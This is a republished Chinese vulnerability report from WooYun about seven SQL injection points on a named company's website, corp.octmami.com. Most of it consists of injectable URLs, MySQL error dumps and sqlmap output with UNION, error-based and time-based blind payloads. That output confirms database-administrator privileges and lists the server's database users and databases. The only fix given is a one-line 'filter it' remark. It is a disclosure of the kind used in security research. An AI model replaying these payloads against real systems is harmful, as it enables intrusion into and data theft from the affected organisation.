记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

十月妈咪某站接口文件存在七处SQL注入(DBA权限)

2015-12-23 10:00

第一处

有两个

http://corp.octmami.com/ajax_video.php?now_video=8'&type=no_type&times=0.1655799720901996&_=1445346057351

返回错误

code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 11:05:49

Script:



SQL: select * from `oc_video` where w_id=8\' order by norder asc

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right



syntax to use near '\' order by norder asc' at line 1

Errno: 1064





http://corp.octmami.com/ajax_video.php?now_video=8&type=no_type'&times=0.1655799720901996&_=1445346057351

返回错误

code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 11:03:44

Script:



SQL: select * from `oc_video` where typeid=no_type\' w_id=8 order by norder asc

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right



syntax to use near '\' w_id=8 order by norder asc' at line 1

Errno: 1064



那么这两个参数均存在注入了!~~~

开始用sqlmap测试!~~~

1.jpg



2.jpg



code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: type

Type: UNION query

Title: MySQL UNION query (NULL) - 10 columns

Payload: now_video=8&type=-5190 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(

0x7163767271,0x4b797549777567624753,0x716e787371),NULL,NULL,NULL,NULL,NULL#&time

s=0.1655799720901996&_=1445346057351



Place: GET

Parameter: now_video

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: now_video=8 AND 6377=6377&type=no_type&times=0.1655799720901996&_=1

445346057351



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: now_video=8 AND (SELECT 9111 FROM(SELECT COUNT(*),CONCAT(0x71637672

71,(SELECT (CASE WHEN (9111=9111) THEN 1 ELSE 0 END)),0x716e787371,FLOOR(RAND(0)

*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=no_type&times=0.

1655799720901996&_=1445346057351



Type: UNION query

Title: Generic UNION query (NULL) - 10 columns

Payload: now_video=-5154 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71637

67271,0x4a645a524f5669585546,0x716e787371),NULL,NULL,NULL,NULL,NULL-- &type=no_t

ype&times=0.1655799720901996&_=1445346057351



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: now_video=8 AND SLEEP(5)&type=no_type&times=0.1655799720901996&_=14

45346057351

---

there were multiple injection points, please select the one to use for following

injections:

[0] place: GET, parameter: type, type: Unescaped numeric (default)

[1] place: GET, parameter: now_video, type: Unescaped numeric

[q] Quit

> 1

[19:08:17] [INFO] testing MySQL

[19:08:17] [INFO] confirming MySQL

[19:08:18] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.4.16, PHP 5.6.12

back-end DBMS: MySQL >= 5.0.0

[19:08:18] [INFO] fetching current user

current user: 'oct_crop@%'

[19:08:18] [INFO] fetching current database

current database: 'octmami'

[19:08:18] [INFO] testing if current user is DBA

[19:08:18] [INFO] fetching current user

current user is DBA: True



database management system users [9]:

[*] ''@'localhost'

[*] 'chen'@'%'

[*] 'ecstore'@'localhost'

[*] 'proftpd'@'%'

[*] 'proftpd'@'localhost'

[*] 'root'@'%'

[*] 'root'@'127.0.0.1'

[*] 'root'@'::1'

[*] 'root'@'localhost'



available databases [11]:

[*] corp

[*] ecstore

[*] information_schema

[*] mysql

[*] octmami

[*] performance_schema

[*] purchase

[*] server

[*] test

[*] youxi

[*] zentao



测试过程不稳定,容易断掉,就不继续测试了,具体可以参考,是一样的!~~~

WooYun: 十月妈咪某后台系统弱口令并登录后多处存在SQL注入(DBA权限+读取任意文件+大量信息[可能是测试信息])

这里测试过的!~~~



第二处:

http://corp.octmami.com/ajax_video.php?type=4'&times=0.5367835881188512&_=1445345926532

返回错误

code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 11:27:28

Script:



SQL: select * from `oc_video` where typeid=4\' order by norder asc

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right



syntax to use near '\' order by norder asc' at line 1

Errno: 1064



一样的就不测试了!~~~



第三处

http://corp.octmami.com/ajax_magazine.php?type=3&times=0.38723763078451157&_=1445351065660

返回错误

code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 11:37:07

Script:



SQL: select * from `oc_magazine` where typeid=3\' order by norder asc

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right



syntax to use near '\' order by norder asc' at line 1

Errno: 1064





下面的就不继续测试了,因为系统不稳定,访问几秒就断了

直接用上次测试的记录吧!~~~



第四处

http://corp.octmami.com/product.php?m=product_list&category=2'

code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 12:18:35

Script:



SQL: select * from `oc_product_sort` where s_id=2\'

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right



syntax to use near '\'' at line 1

Errno: 1064





第五处

http://corp.octmami.com/product.php?m=product&category=2&item=1069'

http://corp.octmami.com/product.php?m=product&category=2'&item=1069

code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 12:19:30

Script:



SQL: select * from `oc_product`where name_cn<>"" and p_id=1069\' and ptype=2 order by p_id desc,norder asc

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right



syntax to use near '\' and ptype=2 order by p_id desc,norder asc' at line 1

Errno: 1064



Web! info: MySQL Query Error



Time: 2015-11-07 12:19:57

Script:



SQL: select * from `oc_product`where name_cn<>"" and p_id=1069 and ptype=2\' order by p_id desc,norder asc

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right



syntax to use near '\' order by p_id desc,norder asc' at line 1

Errno: 1064





第六处

http://corp.octmami.com/classroom.php?page=214&item=60'

code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 12:22:06

Script:



SQL: select * from `oc_wiki_info` where i_id=60\'

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right



syntax to use near '\'' at line 1

Errno: 1064



测试.jpg





第七处

http://corp.octmami.com/ajax_magazine.php?now_magazine=1'&type=no_type&times=0.4457961064763367&_=1446902294075

错误信息返回

code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 17:24:06

Script:



SQL: select * from `oc_magazine` where id=1\' order by norder asc

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1

Errno: 1064





http://corp.octmami.com/ajax_magazine.php?type=4'&times=0.9216494632419199&_=1446902299660

错误信息返回



code 区域
Web! info: MySQL Query Error



Time: 2015-11-07 18:12:30

Script:



SQL: select * from `oc_magazine` where typeid=4\' order by norder asc

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1

Errno: 1064





半夜测试的,发现时间对不上,系统时间设置不一样?



corp1.jpg



corp2.jpg



sqlmap测试



code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: type

Type: UNION query

Title: MySQL UNION query (69) - 8 columns

Payload: now_magazine=1&type=-3688 UNION ALL SELECT 69,69,69,69,69,CONCAT(0x

7166757971,0x4b6665667a7575427358,0x7173657771),69,69#&times=0.4457961064763367&

_=1446902294075



Place: GET

Parameter: now_magazine

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: now_magazine=1 AND (SELECT 2251 FROM(SELECT COUNT(*),CONCAT(0x71667

57971,(SELECT (CASE WHEN (2251=2251) THEN 1 ELSE 0 END)),0x7173657771,FLOOR(RAND

(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=no_type&times

=0.4457961064763367&_=1446902294075

---

there were multiple injection points, please select the one to use for following

injections:

[0] place: GET, parameter: type, type: Unescaped numeric (default)

[1] place: GET, parameter: now_magazine, type: Unescaped numeric

[q] Quit

> 1

[01:25:15] [INFO] testing MySQL

[01:25:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go

ing to retry the request

[01:25:15] [WARNING] if the problem persists please try to lower the number of u

sed threads (option '--threads')

[01:25:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go

ing to retry the request

[01:25:18] [WARNING] reflective value(s) found and filtering out

[01:25:18] [INFO] confirming MySQL

[01:25:18] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.4.16, PHP 5.6.12

back-end DBMS: MySQL >= 5.0.0

[01:25:18] [INFO] fetching current user

[01:25:19] [INFO] retrieved: oct_crop@%

current user: 'oct_crop@%'

[01:25:19] [INFO] fetching current database

[01:25:19] [INFO] retrieved: octmami

current database: 'octmami'

[01:25:19] [INFO] testing if current user is DBA

[01:25:19] [INFO] fetching current user

current user is DBA: True



corp3.jpg



corp4.jpg



还是太慢了,时而连上时而断开,就不继续了!~~~

漏洞证明:

如上

修复方案:

过滤修复


知识来源: www.wooyun.org/bugs/wooyun-2015-0152658

阅读:188257 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“十月妈咪某站接口文件存在七处SQL注入(DBA权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云